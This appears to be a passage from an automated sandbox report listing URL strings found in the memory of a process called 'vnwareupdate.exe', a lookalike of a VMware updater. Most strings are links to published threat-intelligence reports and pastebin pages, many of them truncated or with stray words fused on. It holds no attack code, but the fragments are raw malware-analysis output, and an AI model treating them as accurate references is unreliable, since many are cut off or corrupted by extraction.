Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/another-spoofed-hmrc-company-excel-documents-deli
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/another-spoofed-hmrc-company-excel-documents-deliSpoofed
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/another-spoofed-hmrc-company-excel-documents-deliTargeted
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/fake-efax-delivers-trickbot-banking-trojan/
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/fake-efax-delivers-trickbot-banking-trojan/Fake
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/fake-efax-delivers-trickbot-banking-trojan/New
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/fake-swift-copy-notification-payment-slip-malspam
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/fake-swift-copy-notification-payment-slip-malspamFake
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/fake-swift-copy-notification-payment-slip-malspamench
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/invoice-notification-with-id-number-40533-deliver
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/more-fake-receipts-and-payment-receipt-emails-delGlobe
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/more-fake-receipts-and-payment-receipt-emails-delThe
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/new-powershell-ransomware-coming-in-malspam-email
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/new-powershell-ransomware-coming-in-malspam-emailPowerShell
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/new-powershell-ransomware-coming-in-malspam-emailSandworm
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/scanned-image-from-mx-2600n-with-password-protect
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/scanned-image-from-mx-2600n-with-password-protectScanned
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/scanned-image-from-mx-2600n-with-password-protectTurlas
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/spoofed-hsbc-account-secure-documents-malspam-del
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/spoofed-rfq-quotation-from-sino-heavy-machinery-c
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/spoofed-uk-fuels-collection-malspam-delivers-malw
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/spoofed-uk-fuels-collection-malspam-delivers-malwSpoofed
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/spoofed-uk-fuels-collection-malspam-delivers-malwThe
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/the-return-of-locky-with-fake-invoice-emails/
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/trickbot-downloaded-via-vbs-email-blank-subject-n
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://myonlinesecurity.co.uk/trickbot-downloaded-via-vbs-email-blank-subject-nMultiple
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://mzultra.wordpress.com/2014/05/06/c654645ff44bbaa41e5b77be8889f5e5/
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://mzultra.wordpress.com/2014/05/06/c654645ff44bbaa41e5b77be8889f5e5/Pcoka
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-r
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-rFlokibot
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://niebezpiecznik.pl/post/jak-przeprowadzono-atak-na-knf-i-polskie-banki-or
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://niebezpiecznik.pl/post/jak-przeprowadzono-atak-na-knf-i-polskie-banki-orFrom
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://nioguard.blogsp
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://nioguard.blogspXData
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf
Source: vnwareupdate.exe, 00000003.00000003.233668995.0000000005DB3000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x0E.html
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x17.html
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x17.htmlFinding
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x17.htmlSPEAR:
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x18.html
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x18.htmlDing
Source: vnwareupdate.exe, 00000003.00000003.237611046.00000000038E7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245916145.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x26.html
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x26.htmlBadPatch
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x26.htmlFurtim
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://objective-see.com/blog/blog_0x26.htmlROKRAT
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/MGAVB1uz
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/MGAVB1uzdfAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/MGAVB1uzfAPTnotes
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/Ncu00NRv
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/Ncu00NRvREGIN
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/Y7pJv3tK
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2ux
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2ux//SWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2ux/LSWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2ux56SWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2ux63SWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2ux9aSWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2uxSWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2uxbeSWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2uxeaThe
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/xHLqW2uxs
Source: vnwareupdate.exe	String found in binary or memory: https://plusvic.github.io/yara
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://proofpoint.com/us/threat-insight/post/Not-Yet-Dead
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://proofpoint.com/us/threat-insight/post/Not-Yet-DeadContinued
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://proofpoint.com/us/threat-insight/post/Not-Yet-DeadDridex
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHas
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHas(2010)
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHas.Operation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHasThe
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/citizenlab/malware-indicators/master/201611_Ke
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/citizenlab/malware-indicators/master/201611_KeIt
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/citizenlab/malware-indicators/master/201707_In
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/citizenlab/malware-indicators/master/201707_In8P
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/citizenlab/malware-indicators/master/201707_InInsider
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/citizenlab/malware-indicators/master/201707_InNew
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/fireeye/pivy-report/master/PIVY-Appendix.pdf
Source: vnwareupdate.exe, 00000003.00000003.237953574.0000000003A27000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/13
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/2564af38;APTnotes
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/29768a2452a0e3abde02
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/2abcbff517a4adb2609f
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/32172544079ff42890db
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/40b299824e34394f334b
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/4724f2b83f4181d3df47
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/4dec74bc41c581b82459
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/6b38ec36d001361edd98
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/75585c3b871405dd299d
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/7c8d63137ed7a0b365cc
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/;US
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/Bankshot
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/IoTroop
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/ac317ed78f8016d59cb4
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/b9feb1af431404d1c55e
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/c310a9c431577f348923
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/c5f97184;APTnotes
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/d3f074b70788897ae7e2
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/d8cfafa2b02b6a25bd3b
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/dc8985226b7b2c468bb8
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/e3aa12fb899cd715abbe
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/f70e18fe0dedabefe9bf
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/h
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/ho
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/k-MaudiOperation.pdf
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/s
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/1A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/5Continued
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/8A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/Cyberattack
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/aA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/gA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/iA
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirp
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirp-
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirp285ff9c2339c8e9dbf;A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirp29APT3
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirp5aAPT3
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirp86APT3
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpdiAPT3
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpe7APT3
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/apt-attack-middle-east-big-bang/
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/iotroop-botnet-full-investigation/
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/iotroop-botnet-full-investigation/.pBRONZE
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/iotroop-botnet-full-investigation/01IoTroop
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/iotroop-botnet-full-investigation/IoTroop
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/iotroop-botnet-full-investigation/arIoTroop
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/iotroop-botnet-full-investigation/ark-MaudiOperation.pdf
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/iotroop-botnet-full-investigation/raIoTroop
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-ba
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-baPTCyber
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-badfThe
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-baseThe
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-bateThe
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/Paranoid
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-malspam-targeting-bra
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-malspam-targeting-braMalspam
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-malspam-targeting-braNemucodAES
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-v00OilRig
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-vCerber
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-vOilRig
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-vTargeted
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-vTemp.Periscope
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-vTriton
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-tro
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-troSpyDealer:
